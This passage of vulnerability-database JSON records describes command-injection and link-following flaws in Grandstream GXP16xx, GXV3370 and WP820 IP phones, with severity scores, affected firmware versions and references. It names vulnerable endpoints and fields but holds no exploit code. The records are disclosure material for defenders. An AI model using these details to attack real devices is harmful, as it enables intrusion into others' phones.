"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003967",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5738",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-003967",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-25972",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-902",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker uploads a specially crafted tar file to the HTTP /cgi-bin/upload_vpntar interface. Grandstream GXP1600 A link interpretation vulnerability exists in the series firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GXP1600 is an IP telephony product from American company Grandstream. \n\r\n\r\nThere is a post link vulnerability in the Grandstream GXP1600 series using firmware version 1.0.4.152 and earlier",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "CNVD",
"id": "CNVD-2020-25972"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5738",
"trust": 3.0
},
{
"db": "TENABLE",
"id": "TRA-2020-22",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-25972",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"id": "VAR-202004-2005",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
}
]
},
"last_update_date": "2023-12-18T13:01:46.086000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-59",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.tenable.com/security/research/tra-2020-22"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5738"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5738"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"date": "2020-04-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"date": "2020-04-14T14:15:11.930000",
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"date": "2020-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"date": "2020-04-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003967"
},
{
"date": "2020-04-14T17:54:45.127000",
"db": "NVD",
"id": "CVE-2020-5738"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP1600 post link vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-25972"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "post link",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-902"
}
],
"trust": 0.6
}
}
VAR-201904-0583
Vulnerability from variot - Updated: 2023-12-18 12:56Shell Metacharacter Injection in the SSH configuration interface on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to execute arbitrary system commands and gain a root shell. Grandstream GXP16xx VoIP phone Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXP16xx VoIP is a 16XX series IP phone of Grandstream. The SSH configuration page in Grandstream GXP16xx VoIP version 1.0.4.128 has an operating system command injection vulnerability. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0583",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxp1610",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1615",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1620",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1625",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1628",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1630",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1610_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1615_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1620_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1625_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1625:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1628_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1628:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1630_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17565"
}
]
},
"cve": "CVE-2018-17565",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-17565",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-128037",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-17565",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-17565",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201904-034",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-128037",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-17565",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Shell Metacharacter Injection in the SSH configuration interface on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to execute arbitrary system commands and gain a root shell. Grandstream GXP16xx VoIP phone Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXP16xx VoIP is a 16XX series IP phone of Grandstream. The SSH configuration page in Grandstream GXP16xx VoIP version 1.0.4.128 has an operating system command injection vulnerability. The vulnerability stems from the fact that the network system or product does not correctly filter special characters, commands, etc. in the process of constructing executable commands of the operating system from external input data. Attackers can exploit this vulnerability to execute illegal operating system commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "VULMON",
"id": "CVE-2018-17565"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17565",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-128037",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-17565",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"id": "VAR-201904-0583",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-128037"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:56:34.099000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Important Firmware News (HD IP Phones)",
"trust": 0.8,
"url": "http://grandstream.com/support/firmware"
},
{
"title": "Grandstream GXP16xx VoIP Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90946"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://grandstream.com/support/firmware"
},
{
"trust": 1.8,
"url": "https://iridiumxor.wordpress.com/2019/01/03/three-simple-cves-for-a-good-voip-phone/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17565"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17565"
},
{
"trust": 0.6,
"url": "http://www.iridiumxor.blog/2019/01/three-simple-cves-for-a-good-voip-phone/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-128037"
},
{
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-128037"
},
{
"date": "2019-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"date": "2019-04-01T21:29:26.077000",
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-128037"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-17565"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015175"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-17565"
},
{
"date": "2020-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP16xx VoIP phone Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015175"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-034"
}
],
"trust": 0.6
}
}
VAR-201903-1402
Vulnerability from variot - Updated: 2023-12-18 12:50Grandstream GXV3370 before 1.0.1.41 and WP820 before 1.0.3.6 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in a /manager?action=getlogcat priority field. Grandstream GXV3370 and WP820 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Both Grandstream GXV3370 and Grandstream WP820 are products of Grandstream. Grandstream GXV3370 is an IP video phone device. Grandstream WP820 is a portable business WiFi phone.
There are security vulnerabilities in Grandstream GXV3370 versions before 1.0.1.41 and WP820 versions before 1.0.3.6. An attacker could use this vulnerability to execute an illegal command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1402",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxv3370",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.1.41"
},
{
"model": "wp820",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.3.6"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42880"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003020"
},
{
"db": "NVD",
"id": "CVE-2019-10659"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxv3370_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.1.41",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxv3370:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:wp820_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.3.6",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
